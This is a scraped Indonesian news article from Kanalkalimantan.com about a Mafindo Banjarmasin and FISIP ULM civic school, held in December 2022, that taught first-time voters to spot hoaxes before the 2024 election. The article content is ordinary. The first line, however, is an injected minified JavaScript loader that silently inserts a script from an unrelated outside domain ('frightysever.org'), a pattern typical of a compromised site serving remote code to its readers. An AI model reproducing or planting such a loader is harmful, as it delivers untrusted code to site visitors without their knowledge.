(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PEMILU 2024

Sekolah Kebangsaan bagi Para Pemilih Pemula


KANALKALIMANTAN.COM, BANJARMASIN – Jelang Pemilu Serentak 2024, Mafindo Banjarmasin dan FISIP Universitas Lambung Mangkurat (ULM) bekali pemilih pemula menjadi pemilih cerdas, sekaligus deklarasi Mafindo di gedung Lecture Theater FISIP ULM, pada Kamis (8/12/2022).

Deklarasi MAFINDO Banjarmasin tersebut digelar sebagai bentuk kolaborasi bersama untuk menjadi pejuang literasi digital anti hoaks, anti fitnah, anti hasutan, dan anti radikalisme.

Turut hadir pula menandatangani deklarasi tersebut yakni Ketua KPU Kalsel Sarmuji, Ketua Bawaslu Kalsel Azhar Ridhanie, Diskominfo Kalsel, Diskominfotik Kota Banjarmasin, RTIK Kalsel, dekan dan dosen FISIP ULM, Ketua Senat FISIP ULM, dan mahasiswa.

Heni Mulyati, Presidium Mafindo Pusat berharap, Mafindo Banjarmasin dapat terus maju, semakin berkembang dan menarik banyak relawan untuk bergabung. “Semoga ini bisa menjadi awal bagi Mafindo Banjarmasin untuk terus maju dan berkembang, dan makin banyak relawan yang bergabung,” ujarnya.

 

 

Baca juga: Pembangunan Musholla Darul Fariz, Wali Kota Aditya: Sarana Ibadah dan Komunikasi Sosial

Dekan FISIP ULM, Prof Dr H Budi Suryadi MSi mengatakan, sejumlah peluang dan tantangan di tengah disrupsi politik yang mungkin dihadapi pemilih pemula pada Pemilu Serentak 2024 mendatang. Dikatakan, era disrupsi politik memang memberi kemudahan bagi partai politik lama maupun baru dalam membangun branding, namun di sisi lain juga dapat mendorong parpol dalam gejolak perang media sosial yang nyata. Sehingga persebaran informasi hoaks tak dapat dihindari.

Sri Astuty SSos MSi, Korwil Mafindo Banjarmasin mengatakan, Mafindo Banjarmasin mengambil bagian dalam menyongsong penyelenggaraan Pemilu 2024 dengan kontribusi untuk edukasi dan cek fakta.

“Hari ini kita mengadakan diskusi publik dan sekolah kebangsaan, di mana ini menjadi satu rangkaian dengan kegiatan deklarasi Mafindo Banjarmasin. Harapan saya, teman-teman yang ikut kegiatan ini dapat melakukan cek dan verifikasi informasi yang mengandung unsur hasutan, fitnah, dan kebohongan. Dan yang penting pula pemilih pemula dapat semakin berpikir kritis, kreatif, dan berdaya di ruang digital,” bebernya.

Kegiatan sekolah kebangsaan yang dihadiri kurang lebih 300 peserta pemilih pemula berlangsung meriah. Para peserta pelatihan antusias mengikuti edukasi, games, dan pembagian doorprize yang diadakan Mafindo Banjarmasin. Pelatihan ini dimaksudkan agar pemilih pemula dapat mengidentifikasi tantangan dalam Pemilu 2024 nanti seperti tsunami informasi, banjir hoaks, politik identitas, serta hate speech.

Baca juga: Pentas Banjarbaru Murdjani Festival Rusuh, Pemain Kuda Lumping Baku Hantam!

“Inti dari acara ini adalah adalah memberikan pemahaman kepada para pemilih pemula tentang bagaimana partisipasi mereka dalam menyongsong Pemilu 2024 nantinya” ujar Sarwani SSos, MMed Kom, relawan Mafindo Banjarmasin

“Edukasi yang diberikan sangat menambah wawasan bagi kami sebagai pemilih pemula untuk dapat membedakan mana fakta mana hoaks agar memilih dengan cerdas di Pemilu 2024”, ujar Ika Indriana, salah satu peserta sekolah kebangsaan. (Kanalkalimantan.com/kk)

Reporter : kk
Editor : kk


Risa

Recent Posts

Tugu Adipura Banjarbaru Layak Dipasang APILL, Tunggu Rekomendasi Resmi BPTD dan BPJN

KANALKALIMANTAN.COM, BANJARBARU - Ruas kawasan Tugu Adipura di Jalan Ahmad Yani Kota Banjarbaru, Kalimantan Selatan… Read More

4 jam ago

Kumpulkan Caleg Terpilih dan Pengurus DPD, PAN Kalsel ‘Panaskan Mesin’ Hadapi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Pasca pelaksanaan Pemilu 2024, Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN)… Read More

6 jam ago

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

9 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

10 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

13 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

14 jam ago

This website uses cookies.